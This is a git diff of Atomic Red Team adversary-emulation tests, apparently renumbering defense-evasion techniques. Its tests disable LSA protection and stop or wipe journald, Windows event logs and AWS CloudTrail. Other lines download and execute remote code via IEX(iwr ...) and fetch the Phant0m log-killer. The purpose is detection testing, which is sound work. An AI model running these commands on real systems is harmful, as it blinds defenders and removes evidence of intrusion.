**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
```
### Atomic Test #2: Disable journal logging via systemctl utility
The atomic test disables the journal logging using built-in systemctl utility
**Supported Platforms:** Linux
**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo systemctl stop systemd-journald #disables journal logging
```
#### Cleanup Commands
```sh
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
```
### Atomic Test #3: Disable journal logging via sed utility
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
**Supported Platforms:** Linux
**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
```
#### Cleanup Commands
```sh
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
```
atomics/T1562/T1562.yaml
-50
View File
@@ -1,50 +0,0 @@
attack_technique: T1562
display_name: 'Impair Defenses'
atomic_tests:
- name: Windows Disable LSA Protection
auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
description: |
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
supported_platforms:
- windows
executor:
command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable journal logging via systemctl utility
auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
description: |
The atomic test disables the journal logging using built-in systemctl utility
supported_platforms:
- linux
executor:
command: |
sudo systemctl stop systemd-journald #disables journal logging
cleanup_command: |
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
name: sh
elevation_required: true
- name: Disable journal logging via sed utility
auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
description: |
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
supported_platforms:
- linux
executor:
command: |
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
cleanup_command: |
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
name: sh
elevation_required: true
atomics/T1562.002/T1562.002.md → atomics/T1685.001/T1685.001.md
+5 -5
View File
@@ -1,4 +1,4 @@
# T1562.002 - Impair Defenses: Disable Windows Event Logging
# T1685.001 - Disable or Modify Tools: Disable or Modify Windows Event Log
## Description from ATT&CK
@@ -10,11 +10,11 @@
>
> There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging)
>
> Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)
> Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1685.001_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1685.001_redcanaryco)
>
> By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
[Source](https://attack.mitre.org/techniques/T1562/002)
[Source](https://attack.mitre.org/techniques/T1685/001)
## Atomic Tests
@@ -200,7 +200,7 @@ Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | exe version of Phant0m | path | PathToAtomicsFolder&#92;T1562.002&#92;bin&#92;Phant0m.exe|
| file_name | exe version of Phant0m | path | PathToAtomicsFolder&#92;T1685.001&#92;bin&#92;Phant0m.exe|
#### Attack Commands: Run with `command_prompt`!
@@ -228,7 +228,7 @@ if (Test-Path "#{file_name}") {exit 0} else {exit 1}
```powershell
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
```
### Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell
atomics/T1562.002/T1562.002.yaml → atomics/T1685.001/T1685.001.yaml
+4 -4
View File
@@ -1,5 +1,5 @@
attack_technique: T1562.002
display_name: 'Impair Defenses: Disable Windows Event Logging'
attack_technique: T1685.001
display_name: 'Disable or Modify Tools: Disable or Modify Windows Event Log'
atomic_tests:
- name: Disable Windows IIS HTTP Logging
auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
@@ -129,7 +129,7 @@ atomic_tests:
file_name:
description: exe version of Phant0m
type: path
default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
default: PathToAtomicsFolder\T1685.001\bin\Phant0m.exe
dependency_executor_name: powershell
dependencies:
- description: |
@@ -138,7 +138,7 @@ atomic_tests:
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
executor:
command: |
"#{file_name}"
atomics/T1562.002/bin/phant0m.exe → atomics/T1685.001/bin/phant0m.exe
View File
atomics/T1562.008/T1562.008.md → atomics/T1685.002/T1685.002.md
+11 -11
View File
@@ -1,4 +1,4 @@
# T1562.008 - Impair Defenses: Disable Cloud Logs
# T1685.002 - Disable or Modify Tools: Disable or Modify Cloud Log
## Description from ATT&CK
@@ -6,7 +6,7 @@
>
> For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the users license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
[Source](https://attack.mitre.org/techniques/T1562/008)
[Source](https://attack.mitre.org/techniques/T1685/002)
## Atomic Tests
@@ -49,7 +49,7 @@ aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
#### Cleanup Commands
```sh
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform destroy -auto-approve
```
@@ -88,13 +88,13 @@ echo Please install the terraform and configure your aws default profile
###### Check Prereq Commands
```sh
if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform init
terraform apply -auto-approve
```
@@ -132,7 +132,7 @@ Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_n
#### Cleanup Commands
```powershell
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform destroy -auto-approve
```
@@ -185,13 +185,13 @@ echo Configure your Azure account using: az login.
###### Check Prereq Commands
```powershell
try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
```powershell
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform init
terraform apply -auto-approve
```
@@ -262,7 +262,7 @@ Update event selectors in AWS CloudTrail to disable the logging of certain manag
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
@@ -335,7 +335,7 @@ This Atomic test will use the Stratus Red Team will first setup a CloudTrail log
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
@@ -408,7 +408,7 @@ This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
| aws_region | AWS region to detonate | string | us-west-2|
#### Attack Commands: Run with `sh`!
atomics/T1562.008/T1562.008.yaml → atomics/T1685.002/T1685.002.yaml
+11 -11
View File
@@ -1,5 +1,5 @@
attack_technique: T1562.008
display_name: 'Impair Defenses: Disable Cloud Logs'
attack_technique: T1685.002
display_name: 'Disable or Modify Tools: Disable or Modify Cloud Log'
atomic_tests:
- name: AWS - CloudTrail Changes
auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
@@ -36,9 +36,9 @@ atomic_tests:
- description: |
Check if the dependency resources are already present.
prereq_command: |
if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform init
terraform apply -auto-approve
executor:
@@ -47,7 +47,7 @@ atomic_tests:
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
cleanup_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
terraform destroy -auto-approve
name: sh
elevation_required: false
@@ -104,9 +104,9 @@ atomic_tests:
- description: |
Create dependency resources using terraform
prereq_command: |
try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
get_prereq_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform init
terraform apply -auto-approve
executor:
@@ -118,7 +118,7 @@ atomic_tests:
name: powershell
elevation_required: false
cleanup_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
terraform destroy -auto-approve
- name: Office 365 - Exchange Audit Log Disabled
auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
@@ -173,7 +173,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
@@ -228,7 +228,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
@@ -282,7 +282,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/T1685.002/src
aws_region:
description: AWS region to detonate
type: string
atomics/T1562.008/src/T1562.008-1/T1562.008-1.tf → atomics/T1685.002/src/T1685.002-1/T1685.007-1.tf
View File
atomics/T1562.008/src/T1562.008-1/policy.json → atomics/T1685.002/src/T1685.002-1/policy.json
View File
atomics/T1562.008/src/T1562.008-1/terraform.tfvars → atomics/T1685.002/src/T1685.002-1/terraform.tfvars
View File
atomics/T1562.008/src/T1562.008-2/T1562.008-2.tf → atomics/T1685.002/src/T1685.002-2/T1685.002-2.tf
View File
atomics/T1562.008/src/T1562.008-2/terraform.tfvars → atomics/T1685.002/src/T1685.002-2/terraform.tfvars
View File
atomics/T1562.012/T1562.012.md → atomics/T1685.004/T1685.004.md
+2 -2
View File
@@ -1,4 +1,4 @@
# T1562.012 - Impair Defenses: Disable or Modify Linux Audit System
# T1685.004 - Disable or Modify Tools: Disable or Modify Linux Audit System Log
## Description from ATT&CK
@@ -8,7 +8,7 @@
>
> With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
[Source](https://attack.mitre.org/techniques/T1562/012)
[Source](https://attack.mitre.org/techniques/T1685/004)
## Atomic Tests
atomics/T1562.012/T1562.012.yaml → atomics/T1685.004/T1685.004.yaml
+2 -2
View File
@@ -1,5 +1,5 @@
attack_technique: T1562.012
display_name: 'Impair Defenses: Disable or Modify Linux Audit System'
attack_technique: T1685.004
display_name: 'Disable or Modify Tools: Disable or Modify Linux Audit System Log'
atomic_tests:
- name: Delete all auditd rules using auditctl
auto_generated_guid: 33a29ab1-cabb-407f-9448-269041bf2856
atomics/T1070.001/T1070.001.md → atomics/T1685.005/T1685.005.md
+3 -3
View File
@@ -1,4 +1,4 @@
# T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
# T1685.005 - Disable or Modify Tools: Clear Windows Event Logs
## Description from ATT&CK
@@ -15,7 +15,7 @@
>
> Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
[Source](https://attack.mitre.org/techniques/T1070/001)
[Source](https://attack.mitre.org/techniques/T1685/005)
## Atomic Tests
@@ -76,7 +76,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
```
atomics/T1070.001/T1070.001.yaml → atomics/T1685.005/T1685.005.yaml
+3 -3
View File
@@ -1,5 +1,5 @@
attack_technique: T1070.001
display_name: 'Indicator Removal on Host: Clear Windows Event Logs'
attack_technique: T1685.005
display_name: 'Disable or Modify Tools: Clear Windows Event Logs'
atomic_tests:
- name: Clear Logs
auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
@@ -56,6 +56,6 @@ atomic_tests:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
name: powershell
elevation_required: true
atomics/T1070.001/src/T1070.001-macrocode.txt → atomics/T1685.005/src/T1685.005-macrocode.txt
View File
atomics/T1070.002/T1070.002.md → atomics/T1685.006/T1685.006.md
+3 -3
View File
@@ -1,4 +1,4 @@
# T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
# T1685.006 - Disable or Modify Tools: Clear Linux or Mac System Logs
## Description from ATT&CK
@@ -12,7 +12,7 @@
> * <code>/var/log/maillog</code>: Mail server logs
> * <code>/var/log/httpd/</code>: Web server access and error logs
[Source](https://attack.mitre.org/techniques/T1070/002)
[Source](https://attack.mitre.org/techniques/T1685/006)
## Atomic Tests
@@ -541,7 +541,7 @@ stat #{journal_folder}
###### Get Prereq Commands
```sh
mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
mkdir -p #{journal_folder} && touch #{journal_folder}/T1685.006.journal
```
### Atomic Test #19: Overwrite Linux Mail Spool
atomics/T1070.002/T1070.002.yaml → atomics/T1685.006/T1685.006.yaml
+3 -3
View File
@@ -1,5 +1,5 @@
attack_technique: T1070.002
display_name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
attack_technique: T1685.006
display_name: 'Disable or Modify Tools: Clear Linux or Mac System Logs'
atomic_tests:
- name: rm -rf
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
@@ -362,7 +362,7 @@ atomic_tests:
prereq_command: |
stat #{journal_folder}
get_prereq_command: |
mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
mkdir -p #{journal_folder} && touch #{journal_folder}/T1685_006.journal
executor:
command: |
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
atomics/T1562.001/T1562.001.md → atomics/T1685/T1685.md
+580 -122
View File
@@ -1,4 +1,4 @@
# T1562.001 - Impair Defenses: Disable or Modify Tools
# T1685 - Disable or Modify Tools
## Description from ATT&CK
@@ -6,7 +6,7 @@
>
> Adversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional. By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)
>
> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tools exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1685), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tools exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
>
> Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
>
@@ -18,71 +18,154 @@
>
> Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
[Source](https://attack.mitre.org/techniques/T1562/001)
[Source](https://attack.mitre.org/techniques/T1685)
## Atomic Tests
- [Atomic Test #1: Disable syslog](#atomic-test-1-disable-syslog)
- [Atomic Test #2: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd)
- [Atomic Test #3: Disable Cb Response](#atomic-test-3-disable-cb-response)
- [Atomic Test #4: Disable SELinux](#atomic-test-4-disable-selinux)
- [Atomic Test #5: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux)
- [Atomic Test #6: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response)
- [Atomic Test #7: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch)
- [Atomic Test #8: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella)
- [Atomic Test #9: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper)
- [Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos)
- [Atomic Test #11: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver)
- [Atomic Test #12: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon)
- [Atomic Test #13: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed)
- [Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key)
- [Atomic Test #15: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service)
- [Atomic Test #16: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell)
- [Atomic Test #17: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt)
- [Atomic Test #18: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry)
- [Atomic Test #19: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features)
- [Atomic Test #20: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files)
- [Atomic Test #21: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service)
- [Atomic Test #22: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows)
- [Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder)
- [Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension)
- [Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process)
- [Atomic Test #26: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule)
- [Atomic Test #27: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism)
- [Atomic Test #28: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun)
- [Atomic Test #29: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab)
- [Atomic Test #30: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth)
- [Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell)
- [Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
- [Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
- [Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
- [Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
- [Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
- [Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder)
- [Atomic Test #38: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks)
- [Atomic Test #39: Clear History](#atomic-test-39-clear-history)
- [Atomic Test #40: Suspend History](#atomic-test-40-suspend-history)
- [Atomic Test #41: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request)
- [Atomic Test #42: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache)
- [Atomic Test #43: Disable Memory Swap](#atomic-test-43-disable-memory-swap)
- [Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci)
- [Atomic Test #45: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com)
- [Atomic Test #46: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion)
- [Atomic Test #47: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos)
- [Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe)
- [Atomic Test #49: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell)
